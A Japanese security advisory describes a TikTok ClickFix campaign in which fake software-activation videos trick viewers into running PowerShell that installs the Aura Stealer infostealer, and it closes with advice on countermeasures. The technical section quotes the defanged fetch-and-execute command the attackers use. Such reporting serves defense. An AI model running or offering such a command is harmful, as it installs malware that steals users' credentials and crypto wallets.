🛡 概要
最近、サイバー犯罪者がTikTokを利用して、人気ソフトウェアの無料アクティベーションガイドに見せかけた情報盗難ウイルスを拡散しています。これらの動画は、WindowsやSpotify、Netflixなどの正規製品のアクティベーション方法を提供するように装っており、ユーザーを欺く手法としてClickFix攻撃を使用しています。このような攻撃は、視聴者が不正なPowerShellコマンドを実行するよう仕向け、コンピューターにマルウェアを感染させることを目的としています。
🔍 技術詳細
この攻撃は、ユーザーに対して次のような簡単なコマンドを実行するよう促します:iex (irm slmgr[.]win/photoshop)。実行すると、PowerShellはリモートサイトに接続し、別のPowerShellスクリプトを取得して実行します。このスクリプトは、Cloudflareのページから2つの実行ファイルをダウンロードします。最初の実行ファイルは、Aura Stealerと呼ばれる情報盗難ウイルスのバリアントです。このマルウェアは、ブラウザの保存された認証情報や暗号通貨ウォレットの情報を収集し、攻撃者に送信します。また、追加のペイロードがダウンロードされ、.NETのVisual C#コンパイラを使用して自己コンパイルされたコードがメモリに注入されます。これにより、さらなる悪影響が懸念されます。
⚠ 影響
このClickFix攻撃により、ユーザーは自身のアカウント情報が危険にさらされる可能性があります。特に、アクティベーションのためにコマンドを実行した場合、すべての認証情報が盗まれる危険があるため、すぐにパスワードを変更する必要があります。また、ClickFix攻撃は過去1年間で人気が高まっており、ランサムウェアや暗号通貨の盗難キャンペーンに利用されています。このような手法による被害は急増しており、ユーザーは十分な注意が必要です。
🛠 対策
ユーザーは、ウェブサイトからコピーしたテキストをオペレーティングシステムのダイアログボックスで実行しないことが重要です。また、不明なソースからのソフトウェアや指示には注意を払い、信頼できる情報源からのみソフトウェアを取得することが推奨されます。さらに、パスワードマネージャーを利用して複雑なパスワードを生成・管理し、二要素認証を設定することで、アカウントの安全性を高めることができます。サイバーセキュリティを意識し、定期的にシステムのセキュリティチェックを行うことも忘れないようにしましょう。
